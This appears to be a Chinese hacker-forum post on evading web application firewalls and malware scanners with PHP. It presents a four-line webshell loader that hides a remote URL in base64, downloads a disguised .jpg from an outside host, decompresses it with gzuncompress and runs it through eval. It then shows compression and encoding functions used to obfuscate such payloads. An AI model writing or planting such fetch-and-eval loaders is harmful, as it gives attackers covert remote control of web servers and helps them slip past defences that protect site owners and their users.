0x4cdf

14X security 官方纪念站


轻松绕过防火墙字数限制以及查杀              作者:落泪红尘

遇到防火墙查杀,不要慌,遇到字数限制,不要慌,我们可以利用PHP函数对付WAF,

@imp0rt  imp0rt给我发了一个大马,跟下面的不一样,他用的是gzdeflate,于是与跟imp0rt开始了一波研究

于是乎!!!!


四行代码的大马:


1
2
3
4
5
<?php
$password = r00tshkjd;
$b=base64_decode('aHR0cDovL3d3dy5qOGhhY2submV0L3IwMHRzeGluLmpwZw==');
$a=file_get_contents($b);
eval(gzuncompress($a));



第一行是密码:r00tshkjd
第二行是是一个base64_decode ,内容为:




第三行是获取b的内容,然后
第四行,先用gzuncompress函数解压$a的内容并执行。

意思就是调用j8hack.net/r00tsxin.jpg的内容,是不是很怕我有后门,好了,那就继续看下去


既然如此,我们仔细的看看。


01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
 
 
$s = 'r00ts.cc 真是一个好论坛';
 
 
$s1 = gzencode($s);
 
$s2 = gzdeflate($s);
 
$s3 = gzcompress($s);
 
echo($s1),"\n";
 
echo($s2),"\n";
 
echo($s3),"\n";
 
 
echo base64_encode($s), "\n";
echo bin2hex($s), "\n";
echo urlencode($s), "\n";
 
?>



这是三种压缩方法,:
压缩函数:gzcompress gzdeflate gzencode
解压函数:gzuncompress gzinflate gzdecode

我们利用gzcompress

保存为r00ts.php去执行的话,你会看到区别在那里